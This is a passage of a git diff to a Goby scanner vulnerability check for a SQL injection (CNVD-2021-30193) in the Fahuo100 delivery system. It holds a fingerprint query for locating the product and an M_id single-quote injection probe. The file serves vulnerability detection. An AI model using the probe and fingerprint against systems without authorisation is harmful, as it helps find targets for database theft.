"0.0.0" + "PostTime": "2021-10-31 17:23:05", + "GobyVersion": "1.8.302" } \ No newline at end of file diff --git a/json/fahuo100_sql_injection_CNVD_2021_30193.json b/json/fahuo100_sql_injection_CNVD_2021_30193.json index a5b837e..cd9bc54 100644 --- a/json/fahuo100_sql_injection_CNVD_2021_30193.json +++ b/json/fahuo100_sql_injection_CNVD_2021_30193.json @@ -1,25 +1,19 @@ { - "Name": "Fahuo100 SQL Injection CNVD-2021-30193", - "Level": "2", + "Name": "fahuo100_sql_injection_CNVD_2021_30193", + "Level": "3", "Tags": [ "SQL Injection" ], "GobyQuery": "header=\"Cache-Control: no-store, no-cache\"", - "Description": "Fahuo100 virtual goods automatic delivery system is a powerful virtual goods automatic delivery system/article paid reading system.", - "Product": "Fahuo100", + "Description": "发货100 M_id参数存在SQL注入漏洞, 攻击者通过漏洞可以获取数据库敏感信息", + "Product": "发货100", "Homepage": "https://www.fahuo100.cn/", - "Author": "", - "Impact": "Fahuo100 M_id SQL Injection", - "Recommendation": "", + "Author": "gobysec@gmail.com", + "Impact": "", + "Recommandation": "undefined
", "References": [ - "https://www.cnvd.org.cn/flaw/show/CNVD-2021-30193" + "https://gobies.org/" ], - "HasExp": false, - "ExpParams": null, - "ExpTips": { - "Type": "", - "Content": "" - }, "ScanSteps": [ "AND", { @@ -27,7 +21,7 @@ "method": "GET", "uri": "/?M_id=1'&type=product", "follow_redirect": true, - "header": null, + "header": {}, "data_type": "text", "data": "" }, @@ -54,6 +48,6 @@ "SetVariable": [] } ], - "PostTime": "0000-00-00 00:00:00", - "GobyVersion": "0.0.0" + "PostTime": "2021-06-03 22:27:28", + "GobyVersion": "1.8.268" } \ No newline at end of file